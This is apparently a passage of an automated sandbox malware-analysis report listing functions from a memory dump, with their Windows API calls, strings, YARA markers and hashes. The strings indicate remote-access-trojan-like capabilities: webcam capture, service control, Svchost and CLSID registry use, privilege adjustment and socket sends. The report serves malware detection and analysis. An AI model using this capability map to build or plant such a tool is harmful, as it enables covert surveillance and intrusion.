                                                                                    • EnterCriticalSection.KERNEL32(00000054), ref: 04ED348D
                                                                                    • LeaveCriticalSection.KERNEL32(00000054), ref: 04ED349A
                                                                                      • Part of subcall function 04ED2560: EnterCriticalSection.KERNEL32(00000054,?,?,00000000,00000000), ref: 04ED2599
                                                                                      • Part of subcall function 04ED2560: EnterCriticalSection.KERNEL32(-0000006C), ref: 04ED259F
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ED34A4
                                                                                    • LeaveCriticalSection.KERNEL32(00000054), ref: 04ED34B9
                                                                                    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 04ED350E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Enter$Leave$ErrorFreeHeapLastsetsockopt
                                                                                    • String ID:
                                                                                    • API String ID: 773220702-0
                                                                                    • Opcode ID: a8a11c6fe38fc803067c86f3c4e5f89765c4515d17637fdd4f69b83500cde016
                                                                                    • Instruction ID: 911c2e2683220ec0a8341ec6b0ba986a01a97e5058ba24c2c41c4ff333ebc924
                                                                                    • Opcode Fuzzy Hash: a8a11c6fe38fc803067c86f3c4e5f89765c4515d17637fdd4f69b83500cde016
                                                                                    • Instruction Fuzzy Hash: 9E21A175A00208EBDB10DFA5DC84FAEBBB9FF88315F10405AFD06A7284CB75A905CB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC3FA0, Relevance: 9.1, APIs: 6, Instructions: 77pipesleepmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000064), ref: 04EC3FD2
                                                                                    • PeekNamedPipe.KERNEL32(?,?,00000400,?,?,00000000), ref: 04EC3FF1
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 04EC4004
                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 04EC401B
                                                                                    • LocalFree.KERNEL32(00000000,?,?,0000003F,?,?,?,?,?,?,?,00000000), ref: 04EC4051
                                                                                    • PeekNamedPipe.KERNEL32(?,?,00000400,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 04EC4084
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LocalNamedPeekPipe$AllocFileFreeReadSleep
                                                                                    • String ID:
                                                                                    • API String ID: 2866027955-0
                                                                                    • Opcode ID: 3ed70c8bcd6c6bbbb15fa9698305f532b67cf64f2316bc96d79b5abad47c88e2
                                                                                    • Instruction ID: 2d0b671e455b06cb2200ac682d879be8be25b7dbc4c308cc857c93b5654795d2
                                                                                    • Opcode Fuzzy Hash: 3ed70c8bcd6c6bbbb15fa9698305f532b67cf64f2316bc96d79b5abad47c88e2
                                                                                    • Instruction Fuzzy Hash: 7B21E672204301AFE710DF55DC85EABB7E9FB88705F50492DFAA1C2194DB70E909CB66
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED1D90, Relevance: 9.1, APIs: 6, Instructions: 72memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,04ED3414,00000000,?,?,04ED31A8,?,?,?,?,00000000), ref: 04ED1DAD
                                                                                    • EnterCriticalSection.KERNEL32(0000006C,?,00000000,?,?,?,04ED3414,00000000,?,?,04ED31A8,?,?,?,?,00000000), ref: 04ED1DEB
                                                                                    • SetLastError.KERNEL32(00000000,?,04ED3414,00000000,?,?,04ED31A8,?,?,?,?,00000000), ref: 04ED1DFC
                                                                                    • LeaveCriticalSection.KERNEL32(0000006C,?,04ED3414,00000000,?,?,04ED31A8,?,?,?,?,00000000), ref: 04ED1E19
                                                                                    • InterlockedDecrement.KERNEL32(00000028), ref: 04ED1E26
                                                                                    • HeapFree.KERNEL32(?,00000000,00000000,00000000,?,04ED3414,00000000,?,?,04ED31A8,?,?,?,?,00000000), ref: 04ED1E47
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$DecrementEnterFreeHeapInterlockedLeave
                                                                                    • String ID:
                                                                                    • API String ID: 2534375417-0
                                                                                    • Opcode ID: 6930aa96769ef4909598809d3371fd40a00f629354ba0992de17e0392f07b406
                                                                                    • Instruction ID: 28a47d888c7e034ed8d133f88a0cc45d3c679cb1b8ee0bcb1595daaacea05647
                                                                                    • Opcode Fuzzy Hash: 6930aa96769ef4909598809d3371fd40a00f629354ba0992de17e0392f07b406
                                                                                    • Instruction Fuzzy Hash: 96213835600105EFDB108F65D848FAABBB9FF88306F04816AFD0697650DB32ED52DBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECE330, Relevance: 9.1, APIs: 6, Instructions: 72networkthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECE335
                                                                                    • SetLastError.KERNEL32(0000139F,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECE419
                                                                                      • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
                                                                                      • Part of subcall function 04ECE8D0: SwitchToThread.KERNEL32(?,?,00000000,04ECE352,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8), ref: 04ECE8FD
                                                                                      • Part of subcall function 04ECE500: SetEvent.KERNEL32(?,?,04EB8B5E,04EFD024,?), ref: 04ECE527
                                                                                      • Part of subcall function 04ECE500: CloseHandle.KERNEL32(00000000,?,04EB8B5E,04EFD024,?), ref: 04ECE54A
                                                                                    • send.WS2_32(?,04EFE6E0,00000010,00000000), ref: 04ECE397
                                                                                    • WSACloseEvent.WS2_32(00000000), ref: 04ECE3C2
                                                                                    • shutdown.WS2_32(?,00000001), ref: 04ECE3DA
                                                                                    • closesocket.WS2_32(?), ref: 04ECE3E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEventThread$CompareCurrentErrorExchangeHandleInterlockedLastSwitchclosesocketsendshutdown
                                                                                    • String ID:
                                                                                    • API String ID: 4222243704-0
                                                                                    • Opcode ID: 7fe98ec9e32b6453175f9d6b8fa6fb33bfa35de6f6a24f0633f8fbfa771ca62e
                                                                                    • Instruction ID: 956e5a51d6313f8d147e4de369e75da19e388168863367de840882c417d679c8
                                                                                    • Opcode Fuzzy Hash: 7fe98ec9e32b6453175f9d6b8fa6fb33bfa35de6f6a24f0633f8fbfa771ca62e
                                                                                    • Instruction Fuzzy Hash: 72211270300602ABD7149F29D84CBA9BBA6FF84316F144659E519876D0CB75F8A6CFD0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC37A0, Relevance: 9.1, APIs: 6, Instructions: 57serviceCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04EC37BE
                                                                                    • OpenServiceW.ADVAPI32(00000000,?,00000024), ref: 04EC37CE
                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?,?,00000024), ref: 04EC37DF
                                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,00000024), ref: 04EC37FD
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000024), ref: 04EC380E
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000024), ref: 04EC3815
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseHandleOpen$ControlManagerQueryStatus
                                                                                    • String ID:
                                                                                    • API String ID: 3062456870-0
                                                                                    • Opcode ID: a2fba87644436c4ecd1f3560012b152038327098de31d8a9693df5c2ede2ec03
                                                                                    • Instruction ID: 1379e42dd8c4f89b3ddea4404c5444c4c89c471cd1f9c974f723ed3f903574c2
                                                                                    • Opcode Fuzzy Hash: a2fba87644436c4ecd1f3560012b152038327098de31d8a9693df5c2ede2ec03
                                                                                    • Instruction Fuzzy Hash: BE019636701214ABD7209B669D48EBBB7BCEB89B52F00502EFD05D2145DE78DC058760
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EE85DC, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,00000000,04EDEBF2,00000000,00000002,?,04EDF853,04EE05A6,00000000,?,00000002), ref: 04EE85E0
                                                                                    • _free.LIBCMT ref: 04EE8613
                                                                                    • _free.LIBCMT ref: 04EE863B
                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00000002,?,?,?,?,?,04EE05A6,00000000,?,04EC703A,00000002), ref: 04EE8648
                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00000002,?,?,?,?,?,04EE05A6,00000000,?,04EC703A,00000002), ref: 04EE8654
                                                                                    • _abort.LIBCMT ref: 04EE865A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 3160817290-0
                                                                                    • Opcode ID: 94fd6e6d9c8afea0724dbce5ac2ef0c45269658ca4ac45699da8ee168098e1f5
                                                                                    • Instruction ID: ddb38e88b0f2ddbec1f1676d1cc00ccdc30950b127de4904648dfa165b88b5ec
                                                                                    • Opcode Fuzzy Hash: 94fd6e6d9c8afea0724dbce5ac2ef0c45269658ca4ac45699da8ee168098e1f5
                                                                                    • Instruction Fuzzy Hash: FAF0A435200902A7E3127737BD08A7E262AFFC166DF21AD16FC19E32A0EE26E9014125
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC1B70, Relevance: 9.0, APIs: 6, Instructions: 41synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 04EC1B87
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 04EC1B8F
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,04EB9635,?,Function_000568D8,00000000), ref: 04EC1B96
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,?,04EB9635,?,Function_000568D8,00000000), ref: 04EC1B9F
                                                                                    • DestroyCursor.USER32(?), ref: 04EC1BC6
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,?,04EB9635,?,Function_000568D8,00000000), ref: 04EC1BDD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseExchangeHandleInterlocked$CursorDestroyObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1528086460-0
                                                                                    • Opcode ID: 46c0788991aeb6df60c2dfc70ce6a1fdeb6187f053009089690012a890631572
                                                                                    • Instruction ID: ff788133ed2456875e8ee518ec9f6358e37f310adc9c4283466cd9abbc217ea6
                                                                                    • Opcode Fuzzy Hash: 46c0788991aeb6df60c2dfc70ce6a1fdeb6187f053009089690012a890631572
                                                                                    • Instruction Fuzzy Hash: BA017C75600210DFDF118F51DD89B867FB9EF49315F004196EE1A9B25ADB71E800CF62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB2900, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 288comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04EB2F60: CoCreateInstance.OLE32(Function_00046FD0,00000000,00000001,04EF7070,00000000,?,?,?,?,?,?,04EB295F,?,?), ref: 04EB2F9A
                                                                                      • Part of subcall function 04EB2F60: SysFreeString.OLEAUT32(04EB295F), ref: 04EB3040
                                                                                    • CoCreateInstance.OLE32(04EF7060,00000000,00000001,04EF7050,?), ref: 04EB29B3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateInstance$FreeString
                                                                                    • String ID: Capture Filter$Grabber$vids
                                                                                    • API String ID: 308859552-3946229282
                                                                                    • Opcode ID: 385500b1807164b2a2badfb53452beaa18e7e42d9657b63a630ea8f4b65dd4a7
                                                                                    • Instruction ID: 31dd667e7d623a593f2451fce1c2fdc96547c1d0815f61dc6d02d9f06bac52c3
                                                                                    • Opcode Fuzzy Hash: 385500b1807164b2a2badfb53452beaa18e7e42d9657b63a630ea8f4b65dd4a7
                                                                                    • Instruction Fuzzy Hash: 23C12A70A00255AFDB24CF64CC84FAAB7B5BF48704F1095D9EA49AB250DB71F985CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB62B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04ECA980: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04ECA9BE
                                                                                      • Part of subcall function 04ECA980: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 04ECA9D1
                                                                                      • Part of subcall function 04ECA980: FreeSid.ADVAPI32(?), ref: 04ECA9DA
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,04ECB38C,?,04F05318,?,?,04ECB38C), ref: 04EB6350
                                                                                    • RegCloseKey.ADVAPI32(04ECB38C,?,04F05318,?,?,04ECB38C), ref: 04EB635D
                                                                                      • Part of subcall function 04EC6C30: wsprintfW.USER32 ref: 04EC6C78
                                                                                      • Part of subcall function 04EC6C30: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04EC6CB5
                                                                                      • Part of subcall function 04EC6C30: RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,?,?), ref: 04EC6CE0
                                                                                      • Part of subcall function 04EC6C30: RegCloseKey.ADVAPI32(?), ref: 04EC6CF6
                                                                                      • Part of subcall function 04EC6B30: wsprintfW.USER32 ref: 04EC6B75
                                                                                      • Part of subcall function 04EC6B30: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04EC6BB2
                                                                                      • Part of subcall function 04EC6B30: RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,?,?), ref: 04EC6BDD
                                                                                      • Part of subcall function 04EC6B30: RegCloseKey.ADVAPI32(?), ref: 04EC6BF3
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00020119,?,?,04F05318,?,?,04ECB38C), ref: 04EB6386
                                                                                    • RegCloseKey.ADVAPI32(?,?,04F05318,?,?,04ECB38C), ref: 04EB6393
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpen$QueryValuewsprintf$AllocateCheckFreeInitializeMembershipToken
                                                                                    • String ID: SOFTWARE\Classes\.codein
                                                                                    • API String ID: 2055797972-3041101089
                                                                                    • Opcode ID: 2436f8e634cf4d2509004b7202982b07fd1d14fe1c6c1d0151674edd9d70c1fc
                                                                                    • Instruction ID: 88c785f334d598e988e7d6c04e78757c26ae7bbce85e8cb4679352088843d210
                                                                                    • Opcode Fuzzy Hash: 2436f8e634cf4d2509004b7202982b07fd1d14fe1c6c1d0151674edd9d70c1fc
                                                                                    • Instruction Fuzzy Hash: 8C21E4706003049BE710AF74E945BABBBE4FF44308F10226DED86D6651EBB1F8918B81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB78A0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EB78CF
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EB7909
                                                                                    • RegSetValueExW.ADVAPI32(?,04EFD09C,00000000,00000004,?,00000004), ref: 04EB792A
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EB7940
                                                                                    Strings
                                                                                    • SOFTWARE\Classes\CLSID\%s, xrefs: 04EB78C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseValue$CreateOpenQuerywsprintf
                                                                                    • String ID: SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 73588525-1183003970
                                                                                    • Opcode ID: e7c42a0fa67dcfcb811983083810569a67c3d7de707df759255d71bde0721895
                                                                                    • Instruction ID: d29c76dab618da1eb5835b839c5a5eed156442f00692745b8e180f44aedee2ba
                                                                                    • Opcode Fuzzy Hash: e7c42a0fa67dcfcb811983083810569a67c3d7de707df759255d71bde0721895
                                                                                    • Instruction Fuzzy Hash: 7D116071A0122CABDB20DBA5AC49EEFBBBCEF85711F0001A6AD0DE6144D6755E44DBD0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC2250, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDesktopWindow.USER32 ref: 04EC2278
                                                                                    • MonitorFromWindow.USER32(00000000,00000002), ref: 04EC2281
                                                                                    • GetMonitorInfoW.USER32 ref: 04EC2295
                                                                                    • EnumDisplaySettingsW.USER32 ref: 04EC22BA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MonitorWindow$DesktopDisplayEnumFromInfoSettings
                                                                                    • String ID: h
                                                                                    • API String ID: 1862586070-2439710439
                                                                                    • Opcode ID: 086dc99ce3208b6c910004712249bffb468f2db3716163e91c006091e081780c
                                                                                    • Instruction ID: a3fc11b91645467819e630dd89d977235f040a2b3088aaa0cca7166f5c5b222b
                                                                                    • Opcode Fuzzy Hash: 086dc99ce3208b6c910004712249bffb468f2db3716163e91c006091e081780c
                                                                                    • Instruction Fuzzy Hash: 8B21D131504745DFD720DF78E845AAAB3A9FFC8366F00471EE85997281DB30A815CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECA0C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 04ECA0FC
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,AppService,00000000,00000000,?,00000104,?,?,?,?,00000000,00000000,00000000,00000000), ref: 04ECA115
                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 04ECA128
                                                                                    Strings
                                                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 04ECA0F2
                                                                                    • AppService, xrefs: 04ECA10D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: AppService$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
                                                                                    • API String ID: 3677997916-1367592619
                                                                                    • Opcode ID: a3fd940262b7f965c1f273c8c407f8f46bbab45199be6978fd8b33c2776f9f5b
                                                                                    • Instruction ID: 4929444506f61425941645f77060e989e8d56e1cfec6d9b1430376d05f405fbb
                                                                                    • Opcode Fuzzy Hash: a3fd940262b7f965c1f273c8c407f8f46bbab45199be6978fd8b33c2776f9f5b
                                                                                    • Instruction Fuzzy Hash: 5D01B572740208BFF7205E99BD86FBAB7BCDB84719F10107EFE48D2140E6A66D115A61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB2500, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04EC8032), ref: 04EB250B
                                                                                    • CreateWindowExA.USER32 ref: 04EB253C
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EB255E
                                                                                    • CloseWindow.USER32 ref: 04EB2579
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseCreateWindow$EventHandle
                                                                                    • String ID: #32770
                                                                                    • API String ID: 1958951703-463685578
                                                                                    • Opcode ID: 74e1a3474e239d9c710393e67fe12d99f469c381f9b235be8292a70a680aa254
                                                                                    • Instruction ID: b00f1c793c8abf0be32f5fc984d80f2623a468289b10ccefb188e70fc06dea36
                                                                                    • Opcode Fuzzy Hash: 74e1a3474e239d9c710393e67fe12d99f469c381f9b235be8292a70a680aa254
                                                                                    • Instruction Fuzzy Hash: C6F0F970642701ABF7319B75AC19F877AE4FF00705F104669FA59EB2C4DBB4F8018A91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBD340, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04EB922C,?,Function_000568D8,00000000), ref: 04EBD35D
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,?,?,04EB922C,?,Function_000568D8,00000000), ref: 04EBD371
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 04EBD37D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressCreateEventLibraryLoadProc
                                                                                    • String ID: RtlAdjustPrivilege$ntdll.dll
                                                                                    • API String ID: 3086787778-64178277
                                                                                    • Opcode ID: 867d1249bc82865283eda7804027dba4f3bdae92368cc311060a5bf577d61dbc
                                                                                    • Instruction ID: 888e247123734097be86e76ff375544073878ee48c60130d99bacab32bd60ff2
                                                                                    • Opcode Fuzzy Hash: 867d1249bc82865283eda7804027dba4f3bdae92368cc311060a5bf577d61dbc
                                                                                    • Instruction Fuzzy Hash: 8F016D71740309BFE7249FA5CC46FAB7B98AB04B50F105119B79A9E1C0EAB4B5808BA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EDF034, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,04EDEFE5,?,?,04EDEF85,?,04F00690,0000000C,04EDF0B8,00000000,00000000), ref: 04EDF054
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 04EDF067
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,04EDEFE5,?,?,04EDEF85,?,04F00690,0000000C,04EDF0B8,00000000,00000000,00000001,04ED5E8A), ref: 04EDF08A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: e51be322ad69717b936e55769e941d59f5f112b4bef70f168cc6c4a92a27b3ae
                                                                                    • Instruction ID: 5e8e7f268e3a519f99486328b1f9a92bd2c000cca655fce1337222ba8d081823
                                                                                    • Opcode Fuzzy Hash: e51be322ad69717b936e55769e941d59f5f112b4bef70f168cc6c4a92a27b3ae
                                                                                    • Instruction Fuzzy Hash: AFF0C230A01208BBCB14DFA5DC08BADBFB4EF48716F054268FD09A2240CB74AD45CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC1380, Relevance: 7.8, APIs: 5, Instructions: 255registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?), ref: 04EC1433
                                                                                    • RegQueryInfoKeyW.ADVAPI32 ref: 04EC145E
                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00020119,?), ref: 04EC14C5
                                                                                    • RegEnumValueW.ADVAPI32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000004,?,?,?,00000000,00000004), ref: 04EC15BF
                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,00000000,00020119,?), ref: 04EC15F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnumValue$CloseInfoOpenQuery
                                                                                    • String ID:
                                                                                    • API String ID: 2078201404-0
                                                                                    • Opcode ID: 8c13f2e37e98c8abc6b5fa593368db0514a9a35a367d18fb779cacf7452a465e
                                                                                    • Instruction ID: 6e7f3339bda478072c326c4027bf9536a70d753bcf94971475d2dc3f2124f502
                                                                                    • Opcode Fuzzy Hash: 8c13f2e37e98c8abc6b5fa593368db0514a9a35a367d18fb779cacf7452a465e
                                                                                    • Instruction Fuzzy Hash: B8911EB1D00119AFDF04DFA9D944AEEBBB8EF48354F148029E816E7240D774AA05CFA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECEB90, Relevance: 7.6, APIs: 5, Instructions: 134networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04ECCC60: StrChrW.SHLWAPI(?,0000003A), ref: 04ECCC84
                                                                                    • WSASetLastError.WS2_32(0000273F,?,?), ref: 04ECEC16
                                                                                      • Part of subcall function 04ECCD10: WSASetLastError.WS2_32(00002741), ref: 04ECCD3A
                                                                                    • socket.WS2_32(00000000,00000001,00000006), ref: 04ECEC39
                                                                                    • WSAIoctl.WS2_32(00000000,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 04ECEC83
                                                                                    • WSAGetLastError.WS2_32 ref: 04ECEC8E
                                                                                    • WSACreateEvent.WS2_32 ref: 04ECECAE
                                                                                      • Part of subcall function 04EB7AB0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04EB7ACE
                                                                                      • Part of subcall function 04EB7AB0: EnterCriticalSection.KERNEL32(?,00000004,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF693
                                                                                      • Part of subcall function 04EB7AB0: LeaveCriticalSection.KERNEL32(?,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6BB
                                                                                      • Part of subcall function 04EB7AB0: SetLastError.KERNEL32(0000139F,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
